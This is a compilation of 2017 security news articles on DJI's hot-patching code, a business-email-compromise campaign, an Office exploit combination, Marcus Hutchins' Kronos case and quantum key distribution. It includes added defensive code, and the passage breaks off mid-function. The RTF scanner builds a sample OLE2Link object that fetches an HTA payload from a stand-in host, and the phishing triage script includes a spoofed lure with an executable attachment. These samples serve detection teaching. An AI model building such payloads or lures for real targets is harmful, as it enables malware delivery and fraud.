STE WILLIAMS

Drone-maker DJI’s Go app contains naughty Javascript hot-patching framework

Updated: Chinese drone firm DJI appears to have baked a hot-patching framework into its Go app that breaks Apple’s App Store terms and conditions, according to drone-hacker sources.

The patching framework in question, JSPatch, appears to be baked into the iOS version of Go. Earlier this year Apple ejected a handful of JSPatch-using apps from the App Store.

China Daily said at the time that over 45,000 apps had been booted due to “hot-patching” concerns.

JSPatch, along with similar hot-patching frameworks such as Rollout.io, fell foul of Apple because it allows substantial changes to be made to apps without triggering a review from Apple. Such reviews are mandatory for all new apps and updates to existing apps.

Anything that gets around review processes, regardless of motivation, raises questions about security. A year ago El Reg warned that JSPatch “had inadvertently spawned a serious security risk for iOS app users”.

A similar framework called Tinker is baked into the Android version of DJI Go, according to sources familiar with the two apps. Both Tinker and JSPatch allow silent updates which could use existing permissions in new ways not previously disclosed to the user.
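Because both frameworks ship inside the app bundle, their presence can be triaged statically. The following is an added example (not DJI, Apple, Tencent or JSPatch code) that scans an IPA or APK, both of which are zip archives, for strings that the two frameworks leave in the binary. The indicator strings are assumptions drawn from the frameworks’ public source trees (JSPatch’s JPEngine class, Tinker’s com.tencent.tinker package) and should be checked against the current release of each before being relied on; the sample archives are constructed stand-ins, not real apps.

```python
"""Triage an IPA or APK for hot-patching frameworks by scanning archive
members for their tell-tale strings.  Added example, not vendor code."""
import io
import zipfile

# Indicator strings assumed from the frameworks' public source trees
# (JSPatch's JPEngine class; Tinker's com.tencent.tinker package).
# Verify against the current release of each framework before relying on them.
INDICATORS = {
    "JSPatch (iOS)": [b"JPEngine", b"JSPatch"],
    "Tinker (Android)": [b"Lcom/tencent/tinker/", b"com.tencent.tinker"],
}
MAX_MEMBER_BYTES = 64 * 1024 * 1024  # skip anything larger than 64 MiB


def scan_archive(archive):
    """Return {framework: [member names in which an indicator was found]}.

    `archive` is a path or file-like object for a zip; IPA and APK are both zips.
    """
    hits = {}
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                continue
            data = zf.read(info)
            for framework, needles in INDICATORS.items():
                if any(needle in data for needle in needles):
                    hits.setdefault(framework, []).append(info.filename)
    return hits


def scan_bytes(blob):
    """Convenience wrapper for an archive already held in memory."""
    return scan_archive(io.BytesIO(blob))


def build_sample(members):
    """Build an in-memory zip from {name: bytes}; constructed test input only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins for an APK and an IPA. Only the magic bytes are real
# (dex header; 64-bit little-endian Mach-O); everything after them is filler.
SAMPLE_APK = build_sample({
    "AndroidManifest.xml": b"<manifest/>",
    "classes.dex": b"dex\n035\x00" + b"\x00" * 32 + b"Lcom/tencent/tinker/loader/Filler;",
})
SAMPLE_IPA = build_sample({
    "Payload/Example.app/Info.plist": b"<plist/>",
    "Payload/Example.app/Example": b"\xcf\xfa\xed\xfe" + b"\x00" * 32 + b"JPEngine\x00",
})
SAMPLE_CLEAN = build_sample({"classes.dex": b"dex\n035\x00" + b"\x00" * 32})

if __name__ == "__main__":
    for label, sample in [("apk", SAMPLE_APK), ("ipa", SAMPLE_IPA), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_bytes(sample) or "no hot-patching indicators")
```

A string hit is a triage signal, not proof: confirm it by listing the Objective-C classes in the Mach-O (class-dump) or the classes in classes.dex (dexdump) before raising it with the vendor, and remember that a framework can be present but switched off, as DJI’s US support said would happen before the code was removed entirely.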

The support person for DJI in the US commented in another thread about JSPatch that they “have been told both Android and iOS will have this functionality removed in the next release”.

We have asked Apple for comment and will update if and when we hear back.

Earlier this month the US Army ordered all of its formations to stop using DJI products, including drones and apps, citing unspecified “cyber vulnerabilities”.

It is not difficult to draw a line between the remote update facilities uncovered by users cracking into DJI’s software and the US Army’s decision, though at the time the American military declined to reveal further details and DJI’s public position was that it had no idea what upset the Pentagon.

DJI representatives did not respond to our request to explain the JSPatch/Tinker situation, having said only that they needed to talk to the company’s “overseas technical team” first. DJI is a Chinese firm, though it has extensive consumer-facing operations in the West.

However, the company did announce it is launching a “local data mode” that “stops internet traffic to and from its flight control apps”. This, DJI said in a statement, “will stop [apps] sending or receiving any data over the internet, giving customers enhanced assurances about the privacy of data generated during their flights.”

Local data mode appears to be similar to enabling flight mode on a mobile phone: the firm says its use will block all updates to maps, geofencing information, new flight restrictions and other software updates.

This is a clear response to the US Army ban on all DJI equipment, presumably in the hope that stopping the drones and their associated apps phoning home to China (pictures and videos can be synced with DJI’s Flickr-style drone photo-sharing website) will soothe the US military’s concerns.

We have asked the US Army if it will restart use of DJI products following this announcement and will update this article if we hear back from them.

British police forces are making increasing use of drones as cheap alternatives to full-blown helicopters. The Devon and Cornwall, Dorset, and Norfolk forces have all used DJI products in trials, with Devon and Cornwall deciding to build its drone unit around DJI Inspire 1 quadcopters. That these aircraft rely on apps which could have been silently tweaked to allow a third party access to live surveillance data gathered by police is undesirable, to say the least. ®

Update

DJI corp comms director Adam Lisberg got in touch with us after publication to say: “DJI will release new versions of the DJI GO apps by the end of August with the code in question removed.”

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/dji_go_app_jspatch_tinker_silent_update_no_review/

APT-style attack against over 4,000 infrastructure firms blamed on lone Nigerian 20-something

A seemingly state-sponsored cyberattack aimed at more than 4,000 infrastructure companies has been blamed on a lone Nigerian cybercriminal.

The campaign started in April 2017, and has targeted some of the largest international organisations in the oil, gas, manufacturing, banking and construction industries. The global scale of the campaign and the organisations marked suggest an expert gang or state-sponsored agency is behind it.

Security researchers at Check Point have blamed the APT-style attack on a single Nigerian national in his mid-20s, living near the country’s capital, Abuja. The crook is using fraudulent emails which appear to originate from oil and gas giant Saudi Aramco, the world’s second largest daily oil producer, targeting financial staff within companies in attempts to trick them into revealing company bank details, or open the email’s malware-infected attachment.

The miscreant used NetWire, a remote-access trojan which allows full control over infected machines, and Hawkeye, a key-logging program. The campaign has resulted in 14 successful infections, earning the criminal thousands of dollars through a class of fraud commonly known as business email compromise.
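The lure described above relies on two things a mail gateway can check mechanically: a display name that claims to be a trusted organisation while the sending domain is not that organisation’s, and an attachment type that has no business in an invoice. The following is an added example, not Check Point’s code or the attacker’s tooling, of a triage function that parses a raw message and reports display-name spoofing, lookalike sending domains, a Reply-To that points somewhere other than the From domain, and risky attachment extensions. The trusted-sender mapping (Saudi Aramco to aramco.com) and the two sample messages are constructed for the example.

```python
"""Flag the display-name and lookalike-domain tricks that BEC lures rely on.
Added example; the trusted mapping and sample messages are constructed."""
import email
from email import policy
from email.utils import parseaddr

# Organisations whose name in a From: display name should only ever arrive
# from these domains.  Assumed mapping for the example; load from a vetted
# partner list in production.
TRUSTED = {"saudi aramco": {"aramco.com"}}
RISKY_EXT = {".exe", ".scr", ".js", ".vbs", ".hta", ".jar", ".docm", ".xlsm"}


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage(raw):
    """Return a list of finding strings for a raw RFC 5322 message (empty if clean)."""
    msg = email.message_from_string(raw, policy=policy.default)
    name, addr = parseaddr(str(msg["From"] or ""))
    from_dom = domain_of(addr)
    findings = []
    for org, good_domains in TRUSTED.items():
        # The display name claims an organisation the sending domain does not belong to.
        if org in name.lower() and from_dom not in good_domains:
            findings.append(f"display-name-spoof:{org}:{from_dom}")
        # The sending domain is a near miss for, or embeds, a trusted domain.
        for good in good_domains:
            brand = good.split(".")[0]
            if from_dom != good and (edit_distance(from_dom, good) <= 2 or brand in from_dom):
                findings.append(f"lookalike-domain:{from_dom}~{good}")
                break
    # Replies are steered to a mailbox the attacker controls.
    reply_to = parseaddr(str(msg["Reply-To"] or ""))[1]
    if reply_to and domain_of(reply_to) != from_dom:
        findings.append(f"reply-to-mismatch:{domain_of(reply_to)}")
    # Executable or macro-bearing attachments dressed up as business documents.
    for part in msg.iter_attachments():
        filename = (part.get_filename() or "").lower()
        if any(filename.endswith(ext) for ext in RISKY_EXT):
            findings.append(f"risky-attachment:{filename}")
    return findings


# Constructed sample lure; the base64 body is just an MZ header stub.
SAMPLE_PHISH = """\
From: "Saudi Aramco Procurement" <accounts@aramco-procurement.com>
Reply-To: aramco.payments@gmail.com
To: finance@victim.example
Subject: Outstanding invoice - please confirm bank details
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please confirm the attached invoice and update our bank details on file.
--b1
Content-Type: application/octet-stream; name="Invoice_0815.exe"
Content-Disposition: attachment; filename="Invoice_0815.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA
--b1--
"""

# Constructed benign message for comparison.
SAMPLE_CLEAN = """\
From: "Acme Supplies" <orders@acme.example>
To: finance@victim.example
Subject: Order 4471 shipped
Content-Type: text/plain

Your order has shipped. No action is required.
"""

if __name__ == "__main__":
    print(triage(SAMPLE_PHISH))
    print(triage(SAMPLE_CLEAN))
```

None of these checks needs the malware to be known: they catch the social-engineering shape of the message, which is why they keep working against “generic malware which is easy to find online”. Pair them with a rule that any request to change bank details is confirmed out of band, which is the control that actually stops the fraud.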

Maya Horowitz, threat intelligence group manager for Check Point, said: “Even though this individual is using low-quality phishing emails, and generic malware which is easy to find online, his campaign has still been able to infect several organisations and target thousands more worldwide. It shows just how easy it is for a relatively unskilled hacker to launch a large-scale campaign that successfully breaches the defences of even large companies, enabling them to commit fraud.

“This emphasises the need for organisations to improve their security to protect against phishing or business email compromise scams, and to educate employees to be cautious about opening emails, even from companies or individuals that they recognise.”

Since uncovering the campaign and establishing its origins, Check Point’s research team has shared its findings to law enforcement authorities both in Nigeria and internationally.

Business email compromise attacks have increased dramatically over the past 18 months. The FBI reported a 270 per cent rise in victims since the start of 2016. Victims lose $50,000 on average. This class of fraud is estimated to have cost organisations globally over $3bn from 2013 to 2016.

Bootnote

On his Facebook account, the crook uses the motto “get rich or die trying”, referencing the song by rapper 50 Cent.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/nigerian_fraud_kingpin/

New Office attack flops but shows how easily crooks weaponise vulns

A new Microsoft Office attack is doing the rounds that combines two previously known exploits.

Security firm Cisco Talos believes that this could be a precursor or test of a new method intended to avoid detection.

The attack, which aims to execute remote code within Microsoft Office, combines CVE-2017-0199 (one of the most common vulnerabilities exploited by malicious documents distributed in spamming campaigns) and CVE-2012-0158.

Talos reckons that the hackers used the combination to avoid Word displaying a prompt that may raise the end user’s suspicions. Another possibility is that they attempted to avoid security defences which may be triggering the combination of OLE2Link in a Word document and the download of an HTA file.

The attack was unsuccessful, indicating “poor testing or quality control procedures”, Talos said. However, this does show a level of experimentation by crooks seeking to use CVE-2017-0199 as a means to launch additional weaponised file types and avoid user prompts.
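The CVE-2017-0199 half of the chain is visible in the document itself: an RTF object whose `\objdata` hex blob carries an OLE2Link object pointing at a remote HTA. The following is an added example, not Talos code, of a triage script that pulls the `\objdata` blobs out of an RTF, decodes them, and reports whether they contain an OLE2Link marker, any embedded URL (ASCII or UTF-16LE, which is how the URL moniker stores it), and whether that URL ends in .hta. It also notes the `\objupdate` control word, which makes Word refresh the object on open. The sample document is constructed for the example with an RFC 5737 documentation address; the MSCOMCTL side of the combination (CVE-2012-0158) is not checked here.

```python
"""Triage an RTF for the OLE2Link-to-HTA pattern (CVE-2017-0199).
Added example, not Talos code; the sample document is constructed."""
import re

OBJDATA_RE = re.compile(rb"\\objdata\s*((?:[0-9a-fA-F]|\s)+)")
# URL moniker stores its target as UTF-16LE, so match one byte, one NUL.
URL_UTF16_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")
URL_ASCII_RE = re.compile(rb"https?://[\x21-\x7e]+")


def extract_objects(rtf):
    """Decode every \\objdata hex blob in the document into raw bytes."""
    objs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]  # tolerate a truncated trailing nibble
        try:
            objs.append(bytes.fromhex(hexdata.decode("ascii")))
        except ValueError:
            continue
    return objs


def scan_rtf(rtf):
    """Return the indicators found: object count, OLE2Link, \\objupdate, URLs, .hta."""
    objs = extract_objects(rtf)
    urls = []
    for blob in objs:
        urls += [m.group(0).decode("utf-16le") for m in URL_UTF16_RE.finditer(blob)]
        urls += [m.group(0).decode("ascii") for m in URL_ASCII_RE.finditer(blob)]
    return {
        "objects": len(objs),
        "ole2link": any(b"OLE2Link" in blob for blob in objs),
        "objupdate": b"\\objupdate" in rtf,
        "urls": urls,
        "hta": any(u.lower().split("?")[0].endswith(".hta") for u in urls),
    }


# Constructed sample: an OLE 1.0 header naming the OLE2Link class, padding,
# then the target URL as UTF-16LE, wrapped in an auto-updating RTF object.
PAYLOAD_URL = "http://198.51.100.7/payload.hta"  # RFC 5737 documentation address
_OLE1_HEADER = b"\x01\x05\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00OLE2Link\x00"
_BLOB = _OLE1_HEADER + b"\x00" * 16 + PAYLOAD_URL.encode("utf-16le") + b"\x00\x00"
SAMPLE_RTF = (
    b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata "
    + _BLOB.hex().encode("ascii")
    + b"}{\\result{\\pict}}}}"
)
BENIGN_RTF = b"{\\rtf1\\ansi Hello, world.}"

if __name__ == "__main__":
    print(scan_rtf(SAMPLE_RTF))
    print(scan_rtf(BENIGN_RTF))
```

Treat this as a first-pass filter for mail-gateway triage rather than a detector: in-the-wild samples routinely split the hex across control words and nested groups, or encode the object so that a flat regex never sees “OLE2Link”, which is exactly the kind of evasion Talos suspects the combination was testing. Anything that trips the OLE2Link or `\objupdate` check deserves a look in a sandbox regardless of whether a URL was recovered.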

“This attack may have been an experiment that didn’t quite work out, or it may be indication of future attacks yet to materialise,” Cisco Talos warns.

El Reg invited Microsoft to respond and we’ll update this story as and when we hear back. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/combo_office_exploits_attack/

US military spies: We’ll capture enemy malware, tweak it, lob it right back at our adversaries

The US Defense Intelligence Agency has vowed to capture enemy malware, study and customize it, and then turn the software nasties on their creators.

Speaking at the US Department of Defense Intelligence Information Systems (DoDIIS) conference in Missouri on Monday, the head of the agency, Lieutenant General Vincent Stewart, told attendees that the US was tired of just taking hits from outside players, and so it was planning to strike back.

“Once we’ve isolated malware, I want to reengineer it and prep to use it against the same adversary who sought to use against us,” he said. “We must disrupt to exist.”

Speaking in front of a cheesy animated world map of simulated cyber-attacks, built by defunct security biz Norse, Stewart said that the traditional stance of the US has been defensive: intrusions would be detected, and infections would be cleaned up. But this would change, he said.

A few worries spring to mind. One is that miscreants, whether state-backed hackers or independent crews, typically use networks and other infrastructure shared with innocent folks: from email to web hosts to ISPs. Malware commandeered by Uncle Sam and launched back at the bad guys could knock out important civilian systems.

Also, attribution is difficult at the best of times – in other words, it’s tricky to be sure who exactly is behind a truly sophisticated attack – so the malware may be flung in the face of a party that had nothing to do with the original assault. A Trojan built by a teenager in a São Paulo bedroom could be incorrectly pinned on Iranian or Russian or Venezuelan government spies, leading to all sorts of awkward conversations at the embassy.

While the DIA employs a very high standard of hacker, flinging repurposed malware at enemies is, to us, a high-risk maneuver. The chances of a server in, say, Uzbekistan getting fried because some other state-sponsored hacker was using it to attack America are very high.

This is also somewhat outside of the DIA’s remit. Online warfare is best handled by the NSA and US Cyber Command, which really do have the best hackers on the US taxpayers’ payroll. Then again, the DIA does have something of a reputation for wanting more digital responsibilities. ®

PS: The DIA said it used Norse’s map because the conference was (U) unclassified, and thus a pretty animated map was the best it had to hand without leaking classified material.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/15/us_government_wants_to_reverseengineer_malware_to_fight_back/

Dashboard tracks ‘desire in foreign councils’ to meddle with democracy

The US and French presidential elections were both highly spirited and targeted by Russian intelligence active-measures teams with the goal of influencing, disrupting and sowing distrust. To listen to the ongoing discussion in media and government, one would think that post-election, the Russian intelligence apparatus had picked up its kitbag and headed back to its lair to noodle how best to revisit the pitch just prior to the next election.

The reality is, they’ve not left the pitch and are still engaged, every day, influencing and planting seeds of distrust. The German Marshall Fund of the United States has provided a grant to facilitate the creation of the Alliance for Securing Democracy, a bipartisan, transatlantic initiative. In early August, the alliance launched Hamilton 68, an online dashboard that measures …

… the content and themes being promoted by Russian influencers online, including attributed sources such as RT (Russia Today) and Sputnik, as well as Twitter accounts that are involved in promoting Russian influence and disinformation goals.

The Hamilton 68 dashboard tracks Russian propaganda within Twitter looking at the content and behavior of more than 600 accounts being used to push the Russian message. Some are bots, while others are state-funded news outlets, or semi-automated accounts that “tweet based on pre-determined rules supplemented by a human user”. The monitored accounts fall into three categories:

  • Attributed accounts that clearly state they are pro-Russian or affiliated with the Russian government.
  • Accounts (including both bots and humans) that are run by troll factories in Russia and elsewhere.
  • Accounts run by people around the world who amplify pro-Russian themes either knowingly or unknowingly, after being influenced by the efforts described above.

The dashboard is named after Alexander Hamilton’s Federalist Paper no. 68, which is both clever and apropos: the Federalist 68 focused on the “desire in foreign powers to gain an improper ascendant in our councils”. Hamilton demonstrated a good deal of prescience as to what was in store for the fledgling democracy in 1788 when he wrote these words. No one could have imagined the successful influence and disruption these past 18 months at the hands of the Russian intelligence apparatus.

The dashboard provides a near real-time look at Russian online efforts. Readers will find displayed a variety of widget boxes:

  • Top Themes – a narrative that highlights the one or two top themes being propagated throughout the Russian network.
  • Top Tweets – the top Tweets from within the network as measured during the preceding 24 hours.
  • Bots and Trolls metrics – metrics presented in bar graph format are provided for, top hashtags, trending hashtags, trending topics, top topics, top domains, trending domains, top URLs, trending URLs, distribution of tweets by hour of day, daily tweet counts and distribution of tweets by day of the week.

Hamilton 68 has unsurprisingly caught the attention of the Kremlin. Indeed, recently departed Russian ambassador to the United States, Sergei Kislyak, attributed the creation of the tool to Washington and not a pro-democracy non-profit.

The creators go to great lengths to emphasize that not every tweet, retweet, or item that finds its way into the network is created by a Russian author, or is germane to the US democratic process. Interspersed with these seemingly innocuous items one will find the propaganda, that which some have come to call fake news. The alliance concludes its introduction to Hamilton 68 with:

We are not telling you what to think, but we believe you should know when someone is trying to manipulate you. What you do with that information is up to you.

While the Hamilton 68 dashboard is focused on the United States, we should note the October 2016 EU strategic communication to counteract propaganda against it by third parties, which warned all EU members about active measures to undermine democracy. The alliance acknowledges that a dashboard could be made for a number of topics beyond the US: France, Germany, the Syria conflict, and Russia’s conflict with Ukraine, to name a few.

Check out the dashboard, provide the creators your feedback and suggestions.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JrQoHHc3pmc/

News in brief: update bricks 500 smart locks; Hutchins pleads not guilty; drone landed on warship

Your daily round-up of some of the other stories in the news

Smart locks bricked by update lock out Airbnb guests

When is a smart lock not such a smart idea after all? When a firmware update bricks two popular models widely used by Airbnb hosts to provide access without the need for pesky actual keys, that’s when.

Lockstate’s LS6i is the model recommended by Airbnb for hosts: the accommodation platform company offers a $50 discount to would-be purchasers via its Host Assist programme. So it didn’t go down well with hosts when a firmware update pushed out last week caused what Lockstate told its customers was a “fatal error” with the LS6i and LS6000i locks.

Lockstate said on Twitter that 500 locks had been affected by the update, and customers were warned that it would take up to 18 days for a full replacement. Or, if users prefer, they can remove the back panel and send that to Lockstate for manual updating, which will take about a week.

We’ve got our doubts about smart locks – this isn’t the first time they’ve caused problems for users. If you need to let folk into your home, for now it might be best to stick to an old-fashioned physical key.

Hutchins pleads not guilty to Kronos charges

Marcus Hutchins, the security researcher arrested in Las Vegas as he prepared to fly home to the UK after Def Con, has pleaded not guilty in a Milwaukee court to charges that he created and distributed the Kronos banking trojan.

Hutchins, 23, who uses the handle @MalwareTechBlog on Twitter and who is best known for stopping the WannaCry ransomware outbreak in its tracks, has been allowed by the court to live and work in Los Angeles for his employer, according to The Register.

He has also had his bail conditions relaxed so that he can now get online: the only restriction on his access now is that he’s not allowed to visit the WannaCry server domain. He’s also had to surrender his passport and remain in the US.

His lawyer, Brian Klein of Baker Marquart, said: “We are very pleased today that the court modified his terms allowing him to return to his important work.”

Photographer lands drone on warship

There have been plenty of warnings about how drones compromise the privacy of individuals and threaten aircraft, and now there’s concern about naval security after an amateur photographer managed to land a drone on a British aircraft carrier docked in Scotland.

The drone’s owner, a member of an amateur photography group, was using his craft to capture video and stills of the 70,000-tonne Queen Elizabeth, the Royal Navy’s newest warship and the biggest ever built for the fleet.

The owner told the BBC that he hadn’t wanted to land on the ship, but the drone was sending warnings about high winds, so he let it land on the ship, which he said was “like a ghost ship”.

He told the BBC that he took a photograph then managed to fly the drone back to his location, and then reported himself to the shipyard’s armed guards. “I thought I would be hauled in and have my footage confiscated. I could have been anybody. I guess they weren’t really bothered because the ship isn’t active yet.”

The Ministry of Defence told the BBC: “We take the security of HMS Queen Elizabeth very seriously. This incident has been reported to Police Scotland, an investigation is under way and we stepped up our security measures in light of it.”

Catch up with all of today’s stories on Naked Security


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/bDEZzsv5MeM/

WannaCry-killer Marcus Hutchins denies Feds’ malware claims

Marcus Hutchins, the WannaCry ransomware killer and now suspected malware developer, was told by a Las Vegas court on Friday he can be released on bail. He also denied any wrongdoing.

The British citizen was sensationally arrested and taken into custody on Wednesday by the FBI. The agents swooped as he was about to board a flight back home to the UK from America after attending the DEF CON hacking conference in Nevada last week. The Feds have accused him of creating, developing, and selling the Kronos banking malware from 2014 to 2015 with an unnamed associate.

On Thursday, he appeared in court for a five-minute hearing, and the case was adjourned for a day to give him more time with his lawyers. On Friday, at 3pm Pacific Time, he appeared before a judge, and indicated he will plead not guilty to the charges against him. He was told he could be released on bail under certain conditions with a $30,000 bond.

However, even though that hearing finished at 3.30pm, Hutchins and his lawyers weren’t able to get to the bail office in time as it closes at 4pm. Thus, he will not be released today – and will spend the weekend behind bars as the office will not reopen until Monday. He’s also due to be flown to Wisconsin for his next court appearance on Tuesday.

“He’s dedicated his life to researching malware and not trying to harm people,” said one of his attorneys, Adrian Lobo. “Using the internet for good is what he’s done.”

Lobo also told journalists Hutchins was able to raise bail money from his supporters, and that his family are still in the UK. We understand the Brit has still not been able to speak to his friends or relatives.

Prior to the hearing, Hutchins filed a motion to allow him to appear in court without wearing full shackles. It’s a measure of how paranoid the US court system is that a 23-year-old computer expert with no violent past could be shackled hand and foot for an administrative hearing. As it was, he appeared in a yellow jumpsuit and orange Crocs.

US Department of Justice prosecutors cited Hutchins’ recent trip to a gun range as proof that he should be denied bail and kept in jail, we’re told. Lobo said the government’s argument was “garbage.”

Crucially, prosecutors are also claiming that Hutchins admitted during interrogation, in which he did not have a lawyer, to writing malware, and allege the Brit hinted he also sold software nasties. That sounds bad; however, bear in mind that Hutchins, who goes by MalwareTechBlog on Twitter, has written and shared malware code online for research purposes.

In April 2014, well before Kronos hit, Hutchins, who works as an antivirus researcher, published a blog post titled: “Coding Malware for Fun and Not for Profit (Because that would be illegal).” In it he explained how to write a bootkit for years-old Windows XP, and took steps to make sure it was next to useless.

“Before you get on the phone to your friendly neighborhood FBI agent, I’d like to make clear a few things: The bootkit is written as a proof of concept, it would be very difficult to weaponize, and there is no weaponized version to fall into the hands of criminals,” he blogged at the time.

And in 2015, Hutchins revealed on Twitter his shock at finding some other code he wrote being used within malware – Kronos, to be exact.

Hutchins’ lawyers say he is not in any way behind the Kronos Trojan, which silently infects Windows PCs to siphon off funds from victims’ online banking accounts. It is typically sold to crooks, who spread it in emails and malicious downloads and then pocket the stolen loot. It is based loosely on the Zeus Trojan, and was announced on Russian-language hacker forums in July 2014.

When free, whenever that will be, Hutchins will have to wear a GPS tag at all times, can’t use the internet, and can have no contact with his unnamed accused co-conspirator. He’s also confined to the US for the time being. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/04/marcus_hutchins_wannacry_kronos_court_bail/

WannaCry vanquisher Marcus Hutchins pleads not guilty to flogging banking trojan Kronos

Marcus Hutchins, the WannaCry kill-switch hero, has today pleaded not guilty to charges of creating and selling malware at a hearing in Milwaukee, Wisconsin.

The court took the unusual step of relaxing the 23-year-old’s bail terms, allowing him to access the internet and work again. He will also be able to live in Los Angeles, where his employer is based. Hutchins is, however, obliged to surrender his passport and will be required to wear a tracking device until his trial, which has been scheduled for October.

“Marcus Hutchins is a brilliant young man and a hero,” said Marcia Hofmann, founder of Zeitgeist Law, outside the courthouse. “He is going to vigorously defend himself against these charges and when the evidence comes to light we are confident that he will be fully vindicated.”

The change in bail conditions is interesting. Usually computer crime suspects are instructed to stay offline completely, but the only restriction on Hutchins is that he can’t visit the WannaCry server domain.

Hutchins became the toast of the infosec world when his actions helped limit the spread of the WannaCry ransomware, which affected NHS hospitals and numerous other organisations worldwide in May.

Hutchins attended the Black Hat and DEF CON conferences in Las Vegas earlier this month only to be arrested before boarding his flight back home to the UK.

US authorities allege he created Kronos, a banking trojan. At an earlier bail hearing, Hutchins’ lawyers had already indicated that he intended to deny the charges.

“We are very pleased today that the court modified his terms to allow him to return to his important work,” said his lawyer Brian Klein, partner at Baker Marquart LLP.

Hutchins faces six charges related to the development and distribution of Kronos. A second, unnamed defendant features on the same rap sheet. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/08/14/hutchins_court_plea/

Why China’s quantum satellites do not herald ‘unhackable’ networks

News sites love a tech story mentioning that spooky word “quantum”, and if you can add a bit of space travel then you’ve probably hit a sweet spot.

It was no surprise, then, that the June announcement by a Chinese team that it had generated “entangled” photon pairs on board the Micius satellite which were separated and sent to cities 1,200km apart on the ground, got attention.

The team followed up this week with a practical demonstration in which entanglement was harnessed to send encryption keys from the same satellite to the ground using a security technology called Quantum Key Distribution (QKD).

QKD, really a complex set of protocols based on quantum physics, has been a thriving field for years, so what is new here?

Headline writers got carried away with the idea that what the Chinese have built is some kind of “unhackable” communications system which, of course, is utter nonsense – though actually, it’s far more interesting than that.

QKD uses the quantum states of photons (in the Micius experiment, entangled photon pairs) to distribute encryption keys. An eavesdropper cannot measure those states without disturbing them, and the disturbance is revealed as a statistically high “error” rate when the two parties compare a sample of the bits they received.

Notice that QKD doesn’t stop the channel from being hackable; it simply means that the interception can’t be hidden from the parties using it. You’re probably wondering, then, why QKD isn’t everywhere. The answer is a mixture of tricky physics and engineering limitations.

Once you’ve entangled electrons or photons it isn’t easy to keep them in that state. Even when you do, pairs can be rare enough that data rates end up being very low and distances short.

Despite attempts to make QKD simpler to implement, it remains a lab-bound technology needing trained physicists to get it working. This raises costs, as does the need to send photons through fibre cables in a point-to-point fashion.

You can read a summary of QKD’s larger engineering limitations in a short paper published by Britain’s NCSC last year but suffice to say that any weakness in the equipment used to set up and verify the sending and receiving of keys can create theoretical security vulnerabilities.

One achievement of the Chinese experiment was to dodge the need for fibre cables by transmitting photons using lasers on Micius through the perfect medium of the atmosphere.

But even if it could be made to work perfectly, new problems arise. Imagine a scenario in a future world where QKD is widely used. In the event that surveillance of a channel is detected, how do the two communicating partners react?

Logically, they stop using the channel and move to another, but what if the same thing happens again? If the attacker can keep this up, they have pulled off a simple denial-of-service attack: no key is ever exposed, but no key is ever agreed either.

A way of countering that would be to build QKD networks large and distributed enough to resist the DoS scenario. The Chinese experiment, based on fleets of satellites, shows this might be feasible.
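Both of the points above, that interception is detected rather than prevented, and that persistent interception becomes a denial of service, can be seen in a few dozen lines of simulation. The following is an added example, not code from the Micius team or from the NCSC paper. It simulates the prepare-and-measure BB84 protocol with an intercept-and-resend eavesdropper rather than the entanglement-based scheme flown on Micius; the detection principle is the same, and BB84 is easier to follow. The 11 per cent abort threshold is the commonly cited BB84 figure and is an assumption of the example; the session schedule is constructed.

```python
"""BB84 with an intercept-and-resend eavesdropper: error rate exposes Eve,
and a persistent Eve turns key agreement into a denial of service.
Added example; not code from the Micius experiment."""
import random

QBER_ABORT = 0.11  # widely cited BB84 threshold; assumed here as the abort point


def bb84_round(n_photons, eavesdrop, seed=0):
    """Run one key-exchange round and return (sifted_key_length, qber).

    Basis 0 and 1 stand for rectilinear and diagonal.  Measuring in the wrong
    basis yields a random bit, which is what gives an eavesdropper away.
    """
    rng = random.Random(seed)
    a_bits = [rng.randrange(2) for _ in range(n_photons)]
    a_bases = [rng.randrange(2) for _ in range(n_photons)]
    b_bases = [rng.randrange(2) for _ in range(n_photons)]
    b_bits = []
    for bit, a_basis, b_basis in zip(a_bits, a_bases, b_bases):
        sent_bit, sent_basis = bit, a_basis
        if eavesdrop:
            # Eve guesses a basis, measures, and re-sends what she saw.
            e_basis = rng.randrange(2)
            e_bit = bit if e_basis == a_basis else rng.randrange(2)
            sent_bit, sent_basis = e_bit, e_basis
        b_bits.append(sent_bit if b_basis == sent_basis else rng.randrange(2))
    # Sifting: keep only positions where Alice and Bob chose the same basis.
    sifted = [(a, b) for a, b, ab, bb in zip(a_bits, b_bits, a_bases, b_bases) if ab == bb]
    if not sifted:
        return 0, 0.0
    # Real implementations sacrifice a random sample to estimate this;
    # the simulation compares the whole sifted key for simplicity.
    errors = sum(1 for a, b in sifted if a != b)
    return len(sifted), errors / len(sifted)


def session_outcomes(n_photons, eve_schedule, threshold=QBER_ABORT, seed=0):
    """For each session, 'key' if the QBER is below threshold, else 'abort'.

    A schedule of all-True is the denial-of-service case: every session aborts.
    """
    outcomes = []
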